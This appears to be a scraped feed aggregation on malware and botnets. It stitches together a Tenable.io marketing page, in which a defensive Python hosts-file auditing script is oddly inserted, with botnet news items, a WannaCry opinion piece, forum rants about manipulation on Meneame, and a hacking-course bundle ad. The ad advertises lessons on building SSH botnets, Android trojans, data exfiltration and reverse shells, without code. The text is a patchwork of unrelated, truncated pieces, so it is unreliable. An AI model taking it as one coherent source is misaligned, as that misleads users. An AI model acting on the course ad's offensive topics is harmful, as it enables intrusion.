Staying Ahead of the Curve   
Tenable.io Malicious Code Prevention Report

As malware attacks continue to make headlines, many organizations struggle to stay ahead of the complex, evolving threat landscape. Attackers use both old and new ways to deliver malware through exploiting existing vulnerabilities, evading security solutions, and using social engineering to deliver malicious payloads. Millions of unique pieces of malware are discovered every year, and even with the best security controls in place, monitoring the thousands of endpoints within your network for malware can be nearly impossible.

Use Tenable.io to quickly address systems that are at risk

Once inside your network, malware can disable security controls, gain access to privileged accounts, replicate to other systems, or maintain persistence for long periods of time. If these risks are not addressed quickly, they can result in long term, devastating consequences for any organization. Using the Malicious Code Prevention Report from Tenable.io™ provides you with the visibility needed to quickly address systems that are at risk.

Malicious Code Prevention Report

Malware scanning

Tenable.io includes a customizable malware scan template into which you can load both known-good and known-bad MD5 hashes, along with a hosts file whitelist. On Windows systems, the default hosts file contains only comment lines, including two commented-out localhost address entries. Most systems query local DNS servers to resolve domain names to IP addresses, but some organizations add entries to the hosts file for dedicated systems within their environment or to block unauthorized websites. Once a hosts file has been modified, the local system consults its entries first and bypasses the records held by your DNS server.

Malware also targets the hosts file to insert redirects to malicious sites or block security solutions from obtaining patches and security updates. For organizations utilizing the hosts file, the Malware Scan template provides you with the ability to add whitelist entries that would otherwise be flagged as abnormal by existing security solutions within your environment.
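The hosts-file check described above can be reproduced outside the scanner. The following is an added example, not Tenable's code: it parses a Windows-style hosts file, skips the commented-out localhost lines, and compares each active entry against an organisation whitelist, flagging entries that redirect or blackhole an update or security-vendor host. The sample file, whitelist and all hostnames are constructed placeholders.

```python
import ipaddress
import re

# Constructed sample of a Windows hosts file: the default header comments,
# the two commented-out localhost entries, one approved local entry and two
# entries of the kind malware adds (redirecting an update host, blackholing a
# security vendor). Every name here is a placeholder, not a real indicator.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#\t127.0.0.1       localhost
#\t::1             localhost
10.0.5.20       intranet.example.internal   # approved local entry
203.0.113.7     update.example-vendor.test
127.0.0.1       av.example-security.test
"""

# Whitelist of (address, hostname) pairs the organisation has approved,
# mirroring the hosts file whitelist the scan template accepts (constructed).
WHITELIST = {
    ("10.0.5.20", "intranet.example.internal"),
}

# Placeholder suffixes for hosts that serve patches or security updates and
# therefore should never be remapped by a hosts entry.
PROTECTED_SUFFIXES = (".example-vendor.test", ".example-security.test")

# Addresses that silently blackhole a name instead of redirecting it.
LOOPBACK_OR_NULL = {"127.0.0.1", "0.0.0.0", "::1"}


def parse_hosts(text):
    """Return (lineno, address, hostname) tuples for every active entry.

    Comment and blank lines (including Windows' commented-out localhost
    lines) are skipped, an inline '#' comment is stripped, and a line that
    maps several hostnames to one address yields one tuple per hostname.
    A first field that is not a valid IP address is reported as malformed.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = re.split(r"\s+", line)
        address, names = fields[0], fields[1:]
        try:
            ipaddress.ip_address(address)
        except ValueError:
            entries.append((lineno, address, "<malformed>"))
            continue
        for name in names:
            entries.append((lineno, address, name.lower()))
    return entries


def audit_hosts(text, whitelist=WHITELIST, protected=PROTECTED_SUFFIXES):
    """Classify each active entry; returns (lineno, verdict, detail) tuples.

    Verdicts: 'ok' (whitelisted), 'blocked-security-host' (a protected name
    pointed at loopback/null), 'redirected-protected-host' (a protected name
    pointed anywhere else), 'unexpected' (any other non-whitelisted entry).
    """
    findings = []
    for lineno, address, name in parse_hosts(text):
        detail = f"{name} -> {address}"
        if (address, name) in whitelist:
            findings.append((lineno, "ok", detail))
        elif name.endswith(protected) and address in LOOPBACK_OR_NULL:
            findings.append((lineno, "blocked-security-host", detail))
        elif name.endswith(protected):
            findings.append((lineno, "redirected-protected-host", detail))
        else:
            findings.append((lineno, "unexpected", detail))
    return findings


if __name__ == "__main__":
    for lineno, verdict, detail in audit_hosts(SAMPLE_HOSTS):
        print(f"line {lineno}: {verdict:26} {detail}")
```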

Malware Scan template

Enabling the File System Scanning option enables you to scan specific directories within your Windows environment such as the C:\Windows, C:\Program Files, and User Profile directories that are frequently used to install malware. You can also scan malware within directories such as C:\ProgramData that are hidden by default on Windows systems.

Scanning files

Organizations can have any number of mapped drives and devices connected to a system. Most anti-virus solutions only scan default directories such as the C:\ drive, and without additional rules in place, malware could easily bypass this security control via flash drive or external USB drive.


The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution. Using the Custom File Directories option, you can include a list of directories within your scan to target mapped drives and attached devices.

YARA rules can also be incorporated into your Tenable.io malware scan. Using a combination of regular expressions, text strings, and other values, YARA examines systems for files that match the conditions defined in the rules file.

Vulnerabilities

The Malicious Code Prevention report provides a comprehensive overview of, among other things, systems infected with malicious backdoors, hosts communicating with botnets, and vulnerabilities that can be exploited by malware.

Along with malware and malicious processes, this report also highlights systems with vulnerabilities that are exploitable by malware. Exploitable vulnerabilities can provide attackers with a backdoor into your network to enable privilege escalation or launch malicious code.

Hosts with vulnerabilities that are exploitable by malware


Tenable.io uses both active and passive methods to detect malicious content, including web traffic analysis, md5sum matching, public malware databases, and links pointing to known malware operators. Web servers hosting malicious content are also included within this report. Malicious code can be injected into a website through a cross-site scripting (XSS) or SQL injection vulnerability.

Attackers often target websites to deliver malicious payloads to a larger audience through message boards or blog posts. Malicious code often remains hidden within iframes, JavaScript code, and other embedded tags that link to third-party websites. This data can help you target and remediate issues on web servers before critical assets or services are impacted.

Botnets often use the HTTP protocol as well as encryption to evade detection by modern security solutions. Information reported by Nessus® and Nessus Network Monitor highlights active inbound and outbound communications with command and control (C&C) servers.

Hosts interacting with known botnets

Keeping your anti-virus clients updated helps to ensure your systems remain protected from malware. This report provides valuable information on the status of your anti-virus and anti-malware solutions, ensuring that they are installed and up to date. The Malware Protection chapter provides a summary of hosts running up-to-date anti-virus clients per operating system.

Anti-virus status

Tenable.io will analyze hosts with outdated anti-virus clients and provide targeted information you can use to remediate issues with anti-virus clients. Data is collected from Nessus that checks the status of various anti-virus clients across Windows, Linux, and Unix-based platforms. Using this information can also help you determine if your anti-virus client has been disabled.

Outdated anti-virus details


No organization is immune from vulnerabilities and attacks. Knowing how systems are compromised can help target response efforts and minimize future damage. Tenable.io provides you with critical insight needed to measure the effectiveness of your security program, and to gain insight into your current risk posture. Using the Malicious Code Prevention report by Tenable.io provides you with targeted information to prioritize remediation efforts, close malicious entry points, and stay one step ahead of attackers and other persistent threats.

Start with Tenable.io

To learn more about Tenable.io, visit the Tenable.io area of our website. You can also sign up for a free trial of Tenable.io Vulnerability Management.


          Malware detected inside a PDF document attached to an email that encrypts the infected computer's data and demands a ransom of 4,500 euros to restore it   


Cybersecurity engineers at CheckPoint have detected a new type of ransomware they have nicknamed JAFF. JAFF spreads through infected PDF documents sent by email. It encrypts the files on the infected computer and, to undo the damage, demands a payment of around 4,500 euros from the user as ransom.

This virus operates through the Necurs botnet, one of the largest and most effective distributors of ...

          By: JulesLt   
A little delayed, as for some reason I'd not correctly set up the RSS feed for the blog. Firstly, I'd like to say hats off to Mr. Fry for avoiding any mention of the Mac in his article, because it would have been both a distraction from the piece, and perhaps also detracted from the message ('ooh, look, it's one of those Mac users banging on about how secure the Mac is again'). Also because there have been Mac and Linux systems that have been found in botnets. How, you may ask? Well, while your basic operating system may be secure, there are a number of programs you can install that can make that irrelevant - for instance, if you're running a web server or database exposed to the Internet, you have a piece of software that's (a) sitting there listening to requests from the Internet (b) capable of running programs (not native Windows or OS X programs, but programs nonetheless. Some d/b and web servers can, for instance, send email). Now luckily, this is software that domestic users are currently unlikely to run. It's also unfair to blame the operating system in this case, but it does show that using OS X or Linux does not proof you against such things entirely.
          By: Richard Morton   
How do we know this blog isn't being written by a botnet, perhaps called Deep Thought? I would consider myself reasonably PC savvy, and yet I am sure it is only a matter of time before I consider myself sure about something on Vista, click the button and then moments later question my wisdom. Perhaps it is only a matter of time before Bill comes up with an Undo button for things like that. What is wrong with "painting a scenario"? It's a metaphor, isn't it? The phrase "if a picture could paint a thousand words" would have you in apoplexy presumably. After all, words can't be painted and a picture can't pick up a brush.
          socialbots, Propaganda-Bots, political bots   

How bots are used to influence opinions. Various media reports, academic studies and other approaches:

http://politicalbots.org/

Election 2016 — Debate Three on Twitter. – Medium 

http://www.nzz.ch/digital/automatisierte-trolle-warum-social-bots-unsere-demokratie-gefaehrden-ld.116166

http://cacm.acm.org/magazines/2016/7/204021-the-rise-of-social-bots/fulltext

https://www.tagesschau.de/inland/social-bots-afd-101.html

http://www.merkur.de/politik/taeusch-roboter-im-us-wahlkampf-social-bots-auch-in-deutschland-denkbar-zr-6898866.html

http://www.faz.net/aktuell/feuilleton/medien/wahlbots-von-donald-trump-hillary-clinton-duellieren-sich-14480033.html

https://detektor.fm/politik/bots-als-meinungsmacher

http://www.zdnet.de/41557643/socialbots-stehlen-250-gbyte-an-nutzerdaten-bei-facebook/

http://www.iftf.org/future-now/article-detail/social-bot-competition-2012

Catalog of friendly, useful, artistic online bots, and resources that can help you make them | botwiki 🤖

https://politicaldatascience.blogspot.de/2016/09/invasion-der-meinungs-roboter.html

http://ondemand-mp3.dradio.de/file/dradio/2016/10/01/breitband_topic_social_bots_im_wahlkampf_drk_20161001_1310_ee42c55a.mp3

https://politicaldatascience.blogspot.com/2016/09/new-publication-are-socialbots-on_8.html

https://politicaldatascience.blogspot.com/2016/08/interview-im-deutschlandfunk-zu.html

https://politicaldatascience.blogspot.de/search?q=bots

https://twitter.com/elektrohase3

http://elektrohase.de

https://twitter.com/search?q=election%20bots

https://motherboard.vice.com/read/twitter-election-bots-hide-tons-of-reply-spam-behind-boring-themed-accounts

https://politicaldatascience.blogspot.de/2015/11/socialbotnets-vortrag-am-gesisorg.html

https://www.welt.de/print/wams/article153931496/Der-Shitstorm-vom-Fliessband.html

https://politicaldatascience.blogspot.de/2016/04/roboshitstorm-bericht-in-der-welt.html

https://de.wikipedia.org/wiki/Wikipedia:Bots

https://en.wikipedia.org/wiki/Wikipedia:Bots

Big Data Storytelling | Artificial Intelligence Software | Narrative Science | Narrative Science

https://en.wikipedia.org/wiki/Computational_journalism

https://de.wikipedia.org/wiki/Textgenerierung#Roboterjournalismus 
          #111 When you know you are right but your arguments don't convince the other person: the backfire effect   

#106 Meneame, if you are not aware of the uses those in power are putting it to here, is a tool for mass manipulation and conformity.
If you are not aware of its "subliminal" effects as you use it, they may be setting you up without you realizing it.

Television and TV news have their tools of manipulation.
Radio, the same.
Newspapers, more of the same.
And meneame too.

I have been talking and reading about this for a long time, and developing the concept of a system for exploiting biases and vulnerabilities. A system for generating false consensus.

The dangers of meneame (WARNING)
Power and manipulation of tunas and sheep on meneame
www.meneame.net/c/20380930

Bias detection and psychological profiling of the tunas and sheep
www.meneame.net/c/20488036

Searching for suitable candidates for cults. A botnet of fanatics one click away.
www.meneame.net/c/20467459
www.meneame.net/c/18192621

Exploitation of the Asch conformity effect
www.meneame.net/c/20417647

And so on, as much as you like.
www.meneame.net/c/20476563

Taking "meneame" without reading the cult's leaflet of contraindications
www.meneame.net/c/20459020

Exploiting how predictably irrational we are (though most people believe they are not)
www.meneame.net/c/19098208

Another similar summary of the possible deception here on meneame
www.meneame.net/c/20492279

Meneame is very dangerous, and warning a fellow user
www.meneame.net/c/20523846
www.meneame.net/c/20492279
www.meneame.net/c/20380930

When will we get the firewall against exploitation of biases and vulnerabilities
www.meneame.net/c/18229401
www.meneame.net/c/20486359

» author: capitan__nemo


          #54 When you know you are right but your arguments don't convince the other person: the backfire effect   

I suppose they will take this effect into account in the guide for responding to anti-vaxxers.
www.meneame.net/story/guia-elaborada-oms-sobre-como-responder-antivacu
www.meneame.net/story/paises-mundo-donde-triunfan-antivacunas

Then there is the matter of trust in a community. Meneame is not a trusted environment at all. An environment full of psychopaths, trolls, counter-intelligence agents, clones, paid agents or fanatics defending a brand, a party, a country, a product, an ideology, a company, a religion, ...
People who, being salaried workers on the job, are highly trained and professional in their specialty of manipulating people in any direction, exploiting their biases and vulnerabilities to the fullest.

In this environment it is more likely that you end up in a cult or being exploited by others. Exploiting your biases and vulnerabilities even if they have good intentions. They will kill any good intention you have.

The deception of meneame. A botnet of fanatics one click away
www.meneame.net/c/20492279
The lie of meneame. With all its vulnerabilities and gaps, more vulnerable to power than even "reason"
www.meneame.net/c/20380930

Then, when the technique described by #3 is used constantly, it undermines the community; it is like psychologically polluting a community. An effect similar to the "broken windows theory" will occur
es.wikipedia.org/wiki/Teoría_de_las_ventanas_rotas
It kills the community and people's intentions to help.

It also happens that when they call you stupid, or ignorant, or an idiot, people would not react and would not care if it did not connect with something inside them. If they felt secure in themselves, statements like these would not affect them. What happens is that this often connects with a feeling of inferiority, or with low or medium self-esteem, or with some other trauma.

Then there is also the exploitation of OCD tendencies, which means we cannot stay calm when we see something that is "wrong", or incorrect, or not symmetrical, according to our beliefs of course. For example, if we see a crooked picture and cannot help straightening it; this happened to the detective in the series "Monk".
Then, the OCD tendency will not always have the same intensity; if there are moments when we are nervous or dealing with some other kind of problem, or not at ease with something in our personal life, not satisfied with our life, not happy about something, then the OCD tendency can increase, and we will be more vulnerable to the intentional pollution technique that #3 mentions

Meneame is an environment where deception is practised and the deception and conformity effect of the Asch experiment is massively exploited. The influence of a false majority (created by bots and clones voting on a comment or a submission) and conformity. With all the vulnerabilities meneame has, this makes it very vulnerable and dangerous to all kinds of intentional manipulation.
www.youtube.com/watch?v=wt9i7ZiMed8
es.wikipedia.org/wiki/Experimento_de_Asch

Here it was said
"It is easier to fool people than to convince them that they have been fooled"
so since you can't teach them or convince them, do you deceive them again in another direction?
I already said this is the excuse of those who don't want to teach or explain and want to keep deceiving. Because teaching and educating require more effort than deceiving; there's another bias.
www.meneame.net/c/20507275

Then the problem also lies with those who don't doubt, don't allow themselves to doubt, are not open to new or different explanations. I don't know whether that is ultimately bad, or a reaction to an environment full of trolls, scammers and manipulators. It's like when a door-to-door salesman (or two) comes to you and you already know and are fully aware that you are completely vulnerable to their techniques, so you shut down completely, you don't even open the door. Can you fight against professional deceivers like salespeople?
#6 #0 #11

» author: capitan__nemo


          Bots, Botnets and Zombies   

You have probably heard terms such as “bots,” “zombies,” and “botnets” in recent news stories about data breaches and other cyber security risks. But what exactly are they, how do they work, and what damage can they cause?


           Are You Cyber-Safe? New Podcast on Tech Topics and Trends Including Facebook’s Ad Technology and Online Privacy Issues, the Botnet War and More   

(PRWeb December 11, 2007)

Read the full story at http://www.prweb.com/releases/CourseCasts/Facebook/prweb575928.htm


          A visit from the friendly botnet from China   
On Thursday I had to learn the painful way that it is not a good idea to keep a wiki with open registration and free editing on the server. Thursday, half past five in Germany, and the server is at 300%-400% load. After some … Read more
          What happens if your WordPress is hacked – or: How botnets are created with hijacked WordPress, fake Flash downloads and node.js   
I just noticed the website of an old employer has been hacked and some JavaScript is injected into their corporate website that runs on WordPress. Ouch. Of course I notified them about it and they're just trying to figure out what happened and how to fix it. This taken care of, I of course […]
          Zombie Networks   
Botnet networks are becoming more and more widespread. Statistical data show that every fourth home computer on the network is a Zombie. How they spread, what they are capable of and why they cannot be dealt with – the reader will find answers to these questions after reading this article. This article was published in issue 7/2007 (27) […]
          SpyEye, ZeuS Users Target Tracker Sites   
Crooks who create botnets with crimeware kits SpyEye and ZeuS are creatively venting their frustration over a pair of Web services that help ISPs and companies block infected machines from communicating with control networks run by the botmasters.
          ZeuS Busts Bring Botnet Beatdown?   
Authorities in the United States, United Kingdom and Ukraine launched a series of law enforcement sweeps beginning late last month against some of the world's most notorious gangs running botnets powered by ZeuS, a powerful password-stealing Trojan horse program. ZeuS botnet activity worldwide took a major hit almost immediately thereafter, but it appears to be already on the rebound, according to one prominent ZeuS-watching site.
          Dozens of ZeuS Botnets Knocked Offline   
Security experts are tracking a massive drop in the global number of control servers for various ZeuS botnets that are online, suggesting that a coordinated takedown effort may have been executed by law enforcement and/or volunteers from the security research community acting in tandem.
          LinkedIn Sues Those Who Broke Into User Data   

Professional social network LinkedIn has recently filed a lawsuit against the party suspected of breaking into user data. With this legal step LinkedIn aims to reveal the identity of the data breakers. According to information cited from TechCrunch on Tuesday (08/16/2016), it is also an effort to maintain the trust of LinkedIn users.

The company, recently acquired by Microsoft for US$26.2 billion (Rp 340 trillion), is suing the data burglars under the Computer Fraud and Abuse Act (CFAA). LinkedIn claims these hackers collected user profiles. "During the period from December 2015 to the present, a number of unidentified people using software or bots have extracted and copied LinkedIn user data," reads the lawsuit.

In this case, LinkedIn accuses the hackers of having built a massive botnet to evade the limits LinkedIn uses to prevent third parties from collecting user profiles. The company has been using a tool called Org Block to block IP addresses suspected of being harmful, as well as Member and Guest Scoring to track page requests.

Even so, LinkedIn remains open to Google search. "LinkedIn has allowed a number of popular and reputable search engines to query and identify LinkedIn pages without passing through its security restrictions," the company said. A LinkedIn representative declined to comment on how the company distinguishes the crawlers of popular search engines from the pages used by the hackers.

Even so, the company said that combating bots while allowing some of the leading search engines is an important step in protecting user data. The case is currently being heard in the US District Court in San Jose.
          Script: Update the #Shorewall firewall's #Blacklist   
One of the benefits Shorewall offers is the use of Blacklists, which lets us keep better control over the access our client machines have or, better still, stay protected from sites dedicated to spreading SPAM, botnets, etc. For this we need to stay up to date and know … Continue reading
          Security: Defending Against Malware and Botnet Attacks   
Malware and botnet-led attacks are one of the biggest threats on the Internet today. Learn how they are formed, how they attack, and how to defend against them using a defense-in-depth approach.
          FBI, DHS Release Technical Details on North Korea’s DDoS Botnet Infrastructure   

The U.S. Department of Homeland Security (DHS) and the FBI today released a technical alert based on a joint analysis of the methods behind North Korea's cyberattacks. From today's release: "This alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. ... DHS and FBI identified Internet Protocol (IP) addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea's distributed denial-of-service (DDoS) botnet infrastructure. This alert contains indicators of compromise (IOCs), malware descriptions, network signatures, and host-based rules to help network defenders detect activity conducted by the North Korean government. The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA."


          The Criminals Behind WannaCry   

359,000 computers infected, dozens of nations affected world-wide! A worm exploiting a Windows OS vulnerability that looks to the network for more computers to infect! This is the most pernicious, evil, dangerous attack, ever.

"The Big One” Wired pronounced.

"An unprecedented attack”, said the head of Europol.

Cue the gnashing of teeth and hand-wringing!

Wait, what? WannaCry isn't unprecedented! Why would any professional in the field think so? I'm talking about Code Red, and it happened in July, 2001.

Since then dozens, perhaps hundreds of Best Common Practice documents (several of which I've personally worked on) have been tirelessly written, published, and evangelized, apparently to no good effect. Hundreds of thousands, perhaps millions of viruses and worms have come and gone.

Our words 'update your systems, software, and anti-virus software' and 'back up your computer', ignored. The object lesson taught by Code Red, from almost sixteen years ago, forgotten.

Criminal charges should be considered: Anyone who administers a system that touches critical infrastructure, and whose computers under their care were made to Cry, if people suffered, or died, as is very much the possibility for the NHS patients in the UK, should be charged with negligence. Whatever ransom was paid should be taken from any termination funds they receive, and six weeks' pay deducted, since they clearly were not doing their job for at least that long.

Harsh? Not really. The facts speak for themselves. A patch was available at least six weeks prior (and yesterday was even made available by Microsoft for 'unsupported' platforms such as Windows XP), as was the case with Code Red.

One representative from a medical association said guilelessly, in one of the many articles I've read since Friday 'we are very slow to update our computers'. This from someone with a medical degree. Yeah, thanks for the confirmation, pal.

The worm has been stopped from spreading. For now. iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com was registered by a security researcher, and sinkholed.

Sorry, forget it. I went for a coffee while writing this, and predictably WannaCry V2 has since been spotted in the wild, without the kill-switch domain left dangling.

What have we learned from all of this, all of this for a lousy $26,000?

If someone gets arrested and charged, and by someone, I mean systems administrators, 'CSOs' and anyone else in line to protect systems who abjectly failed this time, a lot. WannaCry infections to critical infrastructure are an inexcusable professional lapse. Or, we could just do all of this again, next time, and people may die.

Afterthought: My organization, CAUCE.org recently turned 20 years old. When it started, we didn't believe things could get this bad, but it wasn't too soon after that it became apparent. I issued dire warnings about botnets in 2001 to the DHS, I made public pronouncements to these ends in 2005 (greeted by rolled eyes from an RCMP staff sergeant). I may have been a little too prescient for my own good at the time, but can anyone really say, in this day and age, that lives are at stake, and we are counting on those responsible for data safety to at least do the bare minimum? I await your comments, below.

Written by Neil Schwartzman, Executive Director, The Coalition Against Unsolicited Commercial Email - CAUCE


          BrandPost: Poorly Secured IoT Devices Prove a Potent Weapon for DDoS Attackers   

Last year, 2016, was the year that distributed denial of service (DDoS) attacks really lived up to the “distributed” part of their name. Why? Because a scenario long predicted, and feared, finally materialized in a big way. Attackers started to exploit the massive – and poorly secured – Internet of Things (IoT).

In late October, DNS provider Dyn suffered the largest DDoS attack yet seen. Its servers experienced simultaneous attacks that, combined, deluged them with over 1.2 terabyte-per-second of data. The source of the attack – a botnet that first infected and then directed more than 150,000 simple IoT devices, including Internet-connected cameras and DVRs.



          ZombieCoin – Using Bitcoin’s Network To Create Next Generation Botnets   

A botnet represents a network of a large number of compromised machines, which are distinctively referred to as bots or zombies, and are remotely controlled by the “botmaster”. Botnets were originally coded to act as means for vandalism and to “show off” hacking skills, yet they have presently evolved into sophisticated tools that are continuously […]



          Over 1 Million Potential Victims of Botnet Cyber Crime   
The Department of Justice and FBI announced the results of an ongoing cyber crime initiative to disrupt and dismantle “botherders” and elevate the public’s cyber security awareness of botnets. OPERATION BOT ROAST is a national initiative and ongoing investigations have identified over 1 million victim computer IP addresses. The FBI is working with our industry partners, including the CERT Coordination Center at Carnegie Mellon University, to notify the victim owners of the computers. Through this process the FBI may uncover additional incidents in which botnets have been used to facilitate other criminal activity.

A botnet is a collection of compromised computers under the remote command and control of a criminal “botherder.” Most owners of the compromised computers are unknowing and unwitting victims. They have unintentionally allowed unauthorized access and use of their computers as a vehicle to facilitate other crimes, such as identity theft, denial of service attacks, phishing, click fraud, and the mass distribution of spam and spyware. Because of their widely distributed capabilities, botnets are a growing threat to national security, the national information infrastructure, and the economy.

“The majority of victims are not even aware that their computer has been compromised or their personal information exploited,” said FBI Assistant Director for the Cyber Division James Finch. “An attacker gains control by infecting the computer with a virus or other malicious code and the computer continues to operate normally. Citizens can protect themselves from botnets and the associated schemes by practicing strong computer security habits to reduce the risk that your computer will be compromised.”

The FBI also wants to thank our industry partners, such as the Microsoft Corporation and the Botnet Task Force, in referring criminal botnet activity to law enforcement.

Cyber security tips include updating anti‑virus software, installing a firewall, using strong passwords, practicing good email and web security practices. Although this will not necessarily identify or remove a botnet currently on the system, this can help to prevent future botnet attacks. More information on botnets and tips for cyber crime prevention can be found online at www.fbi.gov.

The FBI will not contact you online and request your personal information so be wary of fraud schemes that request this type of information, especially via unsolicited emails. To report fraudulent activity or financial scams, contact the nearest FBI office or police department, and file a complaint online with the Internet Crime Complaint Center, www.ic3.gov.

To date, the following subjects have been charged or arrested in this operation with computer fraud and abuse in violation of Title 18 USC 1030, including:

* James C. Brewer of Arlington, Texas, is alleged to have operated a botnet that infected Chicago area hospitals. This botnet infected tens of thousands of computers worldwide. (FBI Chicago);

* Jason Michael Downey of Covington, Kentucky, is charged in an Information with using botnets to send a high volume of traffic to targeted systems in order to cause damage by impairing their availability. (FBI Detroit); and

* Robert Alan Soloway of Seattle, Washington, is alleged to have used a large botnet to send tens of millions of unsolicited email messages advertising his website, from which he offered services and products. (FBI Seattle)

The FBI will continue to aggressively investigate individuals that conduct cyber criminal acts.
Bank-Busting Jihadi Botnet Comes Back To Life. But Who Is Controlling It This Time?
The powerful botnet Brobot spent almost a year attacking American financial institutions before disappearing as quickly as it appeared. For the last 12 months, it looked as if this dangerous cyber-threat had been defeated for good. Now Brobot is back, security experts have revealed, and it looks as if it [...]
What do Mirai & IoT botnets mean to the public sector?
5 First Steps to Defending against IoT Driven DDoS Attacks
In honor of October's National Cybersecurity Awareness Month, users of Twitter, Netflix, Reddit and the New York Times received a special treat, just in time for Halloween. Unfortunately it was more of a trick, as users of these and other major […]
BOTNET
СХ -- 9.07.11 evidence
Pay What You Want: White Hat Hacker 2017 Bundle for $1
These 63 Hours of Training in the Most Up To Date Security Tools & Practices Can Earn You a New Career
Expires October 26, 2021 23:59 PST
Buy now and get 99% off

The Complete Ethical Hacking Course for 2016-2017


KEY FEATURES

The world of ethical hacking and network security is constantly changing, which is what makes this course, specifically built with the most up to date information, so valuable. Whether you're completely new to ethical hacking, or just want to hone your skills with the newest technologies, this course will get you right up to speed with this exciting and lucrative career path.

  • Access 52 lectures & 9.5 hours of content 24/7
  • Get an introduction to ethical hacking
  • Learn Linux installation, terminal basics, & Wireshark setup
  • Understand how to stay anonymous online, how to use proxy servers, & how to access the dark web using TOR
  • Discover Aircrack-ng, HashCat, & WiFi hacking
  • Defend your own networks from attacks
  • Clone websites

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Ermin Kreponic is a strongly motivated young IT expert and Linux enthusiast with a passion for troubleshooting network-related problems. He has an exceptional eye for detail and a sense of urgency when it comes to problem solving.

Python For Android Hacking Crash Course: Trojan Perspective


KEY FEATURES

Mobile security is of utmost importance, and developers will pay good money for pentesters who can identify security flaws in apps. In this course, you'll learn how to use Python to build a Trojan for ethical hacking purposes. You'll be able to discover flaws in Android security and clean them up in one efficient swoop!

  • Access 26 lectures & 3.5 hours of content 24/7
  • Code a simple Android GUI interface w/ Python
  • Build a simple cross platform SSH botnet in Python
  • Create an SSH Android Trojan
  • Transfer & exfiltrate data out of a target device
  • Run Python SSH reverse shell on Windows, Linux, Android

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required
  • PC with 4 GB RAM running Kali Linux in VirtualBox
  • Android 4.2

THE EXPERT

Hussam Khrais is a senior security engineer with over 5 years in penetration testing, Python scripting and network security, where he spends countless hours forging custom hacking tools in Python.

Hussam currently holds the following certificates in information security:
  • GIAC Penetration Testing - GPEN
  • Certified Ethical Hacker - CEH
  • Cisco Certified Network Professional - Security (CCNP Security)

Learn Ethical Hacking From Scratch


KEY FEATURES

Interested in hacking for the good guys? This comprehensive course will take you from zero to hero in the field of ethical hacking, the career path where you get paid to expose system and network security threats. You'll explore four main sections: network penetration testing, gaining access, post exploitation, and web app penetration testing to get a complete, well-rounded education in how to responsibly and effectively improve security.

  • Access 125 lectures & 11.5 hours of content 24/7
  • Learn basic network pentesting
  • Gather information about networks & computers, & learn how to gain access & attack targets
  • Understand how to gain full access to computer systems w/o user interaction
  • Create server side & client side attacks
  • Discover how to interact w/ the systems you've compromised
  • Learn how to detect, prevent, & secure your system & yourself from every attack you learn

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Zaid Al-Quraishi is an ethical hacker, pentester, and programmer. He has extensive experience in ethical hacking and penetration testing, more specifically with regard to network security. Zaid started making video tutorials in 2009 for the ethical hacking website iSecuri1ty, and has also served as an editor, manager, and penetration tester for the company. He teaches mostly by example, specifically by first explaining the theory of each technique and then how it translates to a real-life situation.

Networks From Scratch to Advanced Implementation


KEY FEATURES

Just about all professional organizations and homes have some kind of network connection these days. Obviously, this means there is a huge market for network administrators. In this comprehensive course, you'll dive into networks, learning all you need to implement and maintain active networks in both corporate and personal environments. Soon enough, you'll have the know-how to make (or save!) some dough by managing networks.

  • Access 65 lectures & 12 hours of content 24/7
  • Discuss different types of networks & IP protocols
  • Build a server client network from scratch
  • Configure DHCP, DNS, & file servers
  • Understand routing & switching networks
  • Explore common network attacks & network security concepts

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Mohamed Atef is an ICT Consultant, Senior Penetration Tester and certified instructor with more than 20 years of experience in professional and academic courses and two published books.

  • Certified Information System Security Professional (CISSP) ID #517943
  • Microsoft Certified Trainer (MCT) ID #3022752
  • EC Council Certified Instructor (CEI) ID #ECC51750391761
  • CEH: Certified Ethical Hacking ID #ECC64515022319
  • Certified Cisco System Instructor (CCSI)
  • Microsoft Certified System Engineer (MCSE)
  • Microsoft Certified IT Professional (Windows Server Administration 2008)
  • CompTIA Certified (Network +) ID #
  • CompTIA Certified (Server +)
  • CompTIA Certified (Linux +)
  • CompTIA Certified (Security +)
  • Cisco Certified Network Associate (CCNA) ID #CSCO11273248
  • Cisco Certified Network Professional (CCNP)
  • Project Management Professional (PMP) ID #1772374

Certified Information Systems Security Professional


KEY FEATURES

The CISSP is an internationally recognized certification that demonstrates an IT professional's technical and managerial competence to protect organizations from increasingly sophisticated attacks. It's an ideal certification for anyone who wants to work in IT security, as it satisfies many government and professional security certification mandates and leaps out on a resume. In this course, you'll receive in-depth instruction in all things CISSP, so you can be fully prepared when you decide it's time to take the exam.

  • Access 68 lectures & 9.5 hours of content 24/7
  • Discuss penetration testing & information systems access control
  • Explore common security architecture frameworks
  • Understand different network types & topologies
  • Learn about cryptography, physical security, & operations security
  • Discuss the legal regulations & liability behind systems security

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: intermediate

Compatibility

  • Internet required

THE EXPERT

